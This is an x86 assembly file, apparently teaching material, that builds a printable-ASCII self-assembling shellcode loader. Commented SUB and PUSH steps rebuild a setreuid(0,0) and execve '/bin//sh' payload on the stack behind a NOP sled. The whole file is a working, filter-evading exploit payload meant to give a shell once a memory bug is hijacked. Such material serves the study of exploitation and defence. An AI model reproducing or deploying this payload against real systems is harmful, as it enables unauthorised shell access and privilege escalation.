BITS 32
and eax, 0x454e4f4a  ; Zero out the EAX register
and eax, 0x3a313035  ; by ANDing opposing, but printable bits

sub eax,  0x59434243 ; Subtract various printable values
sub eax,  0x6f6f6f6f ; from EAX to set it to 0xbfffffe0
sub eax,  0x774d4e6e ; (no need to get the current ESP this time)

push eax             ; Push EAX to the stack, and then
pop esp              ; pop that into ESP to do a mov eax, esp

; Now ESP is at 0xbfffffe0
; which is past the loader bytecode that is executing now.

and eax, 0x454e4f4a  ; Zero out the EAX register again
and eax, 0x3a313035  ; using the same trick

sub eax, 0x344b4b74  ; Subtract some printable values
sub eax, 0x256e5867  ; from EAX to wrap EAX to 0x80cd0bb0
sub eax, 0x25795075  ; (took 3 instructions to get there)
push eax             ; and then push EAX to the stack

sub eax, 0x6e784a38  ; Subtract more printable values
sub eax, 0x78733825  ; from EAX to wrap EAX to 0x99e18953
push eax             ; and then push this to the stack

sub eax, 0x64646464  ; Subtract more printable values
sub eax, 0x6a373737  ; from EAX to wrap EAX to 0x51e3896e
sub eax, 0x7962644a  ; (took 3 instructions to get there)
push eax             ; and then push EAX to the stack

sub eax, 0x55257555  ; Subtract more printable values
sub eax, 0x41367070  ; from EAX to wrap EAX to 0x69622f68
sub eax, 0x52257441  ; (took 3 instructions to get there)
push eax             ; and then push EAX to the stack

sub eax, 0x77777777  ; Subtract more printable values
sub eax, 0x33334f4f  ; from EAX to wrap EAX to 0x68732f2f
sub eax, 0x56443973  ; (took 3 instructions to get there)
push eax             ; and then push EAX to the stack

sub eax, 0x254f2572  ; Subtract more printable values
sub eax, 0x65654477  ; from EAX to wrap EAX to 0x685180cd
sub eax, 0x756d4479  ; (took 3 instructions to get there)
push eax             ; and then push EAX to the stack

sub eax, 0x43434343  ; Subtract more printable values
sub eax, 0x25773025  ; from EAX to wrap EAX to 0xc931db31
sub eax, 0x36653234  ; (took 3 instructions to get there)
push eax             ; and then push EAX to the stack

sub eax, 0x387a3848  ; Subtract more printable values
sub eax, 0x38713859  ; from EAX to wrap EAX to 0x58466a90
push eax             ; and then push EAX to the stack

; add a NOP sled
sub eax, 0x6a346a6a  ; Subtract more printable values
sub eax, 0x254c3964  ; from EAX to wrap EAX to 0x90909090
sub eax, 0x38353632  ; (took 3 instructions to get there)
push eax             ; and then push EAX to the stack
push eax             ; many times to build a NOP sled
push eax             ; to bridge the loader code to the
push eax             ; freshly built shellcode.
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax